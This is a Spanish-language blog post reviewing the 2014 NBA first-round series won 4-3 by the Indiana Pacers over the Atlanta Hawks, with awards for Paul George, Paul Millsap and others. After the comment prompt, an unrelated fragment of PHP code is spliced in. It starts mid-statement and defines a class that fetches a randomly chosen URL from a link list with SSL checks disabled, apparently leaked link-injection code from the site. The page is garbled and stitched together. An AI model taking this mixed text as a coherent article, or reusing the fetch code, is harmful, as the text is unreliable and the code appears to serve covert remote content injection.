Playoffs 2014: Resumen Pacers 4 – Hawks 3

04 de May de 2014 por TheDeerHunter

Acertamos ganador para variar, aunque en el último minuto, de penalti injusto y con una buena dósis de potra. Supuestamente todo giraba alrededor de la actitud de los favoritos, los Indiana Pacers, pues como suele ser habitual cuando las cosas no funcionan como es debido la actitud es siempre la razón más socorrida. Es difícil encontrar explicación a una metamorfosis como la que han sufrido. No parece suficiente imputarlo únicamente a una cuestión de química interna, ni siquiera imaginando ciertos los rumores que circulan por ahí. Pasaron de comerse el mundo y ser candidatos al anillo con los futuribles MVP George, DPY Hibbert y MIP Stephenson a que cualquiera se los comiera a ellos. 14 de las 26 derrotas de todo el año se produjeron durante el último mes y medio.

Debería sorprender que a pesar del bajón de juego experimentado, los Pacers afrontaran la eliminatoria unánimemente como favoritos. Podíamos especular sobre cual iba a ser su nivel de motivación pero sólo las 37 victorias de los Hawks ya provocaban que todos dejáramos de lado las dudas que los propios Pacers habían generado. Por mucho que Millsap estuviera tocado por las musas y por mucha voluntad que el equipo de Budenholzer pusiera en el tintero, los Hawks son un equipo muy limitado sin Al Horford. Sin embargo, los Hawks, inferiores sobre el papel, han sabido jugar bien sus cartas tratando de explotar los miedos ajenos, atacando directamente a la yugular a base de triples y confiando en la inoperancia ajena. Dicen que para dominar una serie hay que ganar los partidos impares y ellos lo han hecho a excepción del último, arrancando durante el proceso abucheos en Indianapolis. Sólo el miedo a ganar les privó de dos oportunidades decisivas en casa, especialmente en el cuarto choque, cuando de haber concretado alguna previsiblemente estaríamos hablando de otra cosa.


Llama la atención de nuestra previa que apuntáramos como clave la presencia de Bynum, cuando si acaso deberíamos habernos preguntado por Roy Hibbert, tan grande y con tanta facilidad para esconderse estos días. Por suerte para ellos aún terminó siendo decisivo. Más vale tarde que nunca. Lo de Bynum, pura anécdota y ciencia ficción.

En lo que sí acertamos plenamente es que la serie podría resolverse en función del nivel defensivo que recuperaran los Pacers. Aún no sabemos cuanto mérito les corresponde pero cuando lograron dejar a sus rivales por debajo de los 90 puntos sellaron la victoria y esto, por fortuna para ellos, ha ocurrido 4 veces. Veremos si sigue la tónica contra otros con más recursos.

PREMIOS

MVP: Hemos vuelto a ver una notable versión de Paul George. Anotando bien y con acierto. Reboteando con ferocidad y sabiendo manejar los momentos mejor que nadie. 24 puntos, casi 11 rebotes, más de 4.5 asistencias y casi dos robos y medio por partido. Sólido.

Sorpresa: Los que menos seguimos a Atlanta hemos descubierto a Mike Scott y Shelvin Mack en esta serie. Gracias a ellos la batalla de segundas unidades se la llevó su equipo.

Decepciones: En plural porque no ha sido una serie particularmente brillante. Nos hubiera gustado ver una versión de Louis Williams como la de hace no tanto. Los playoffs nunca han sido su fuerte y aún ha sido capaz de empeorar su mediocre campaña. También señalábamos a Pero Antic como recurso para desquiciar a Roy Hibbert. Por lo visto se desquiciaron mutuamente. A la lista hay que añadir sin falta a Evan Turner. Menuda adquisición.

Esfuerzo en vano: Teague y Korver han estado francamente bien pero el que verdaderamente ha puesto en problemas a Indiana ha sido Paul Millsap, con algunas de las mejores actuaciones de esta primera ronda. Lamentablemente pinchó en el partido decisivo.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>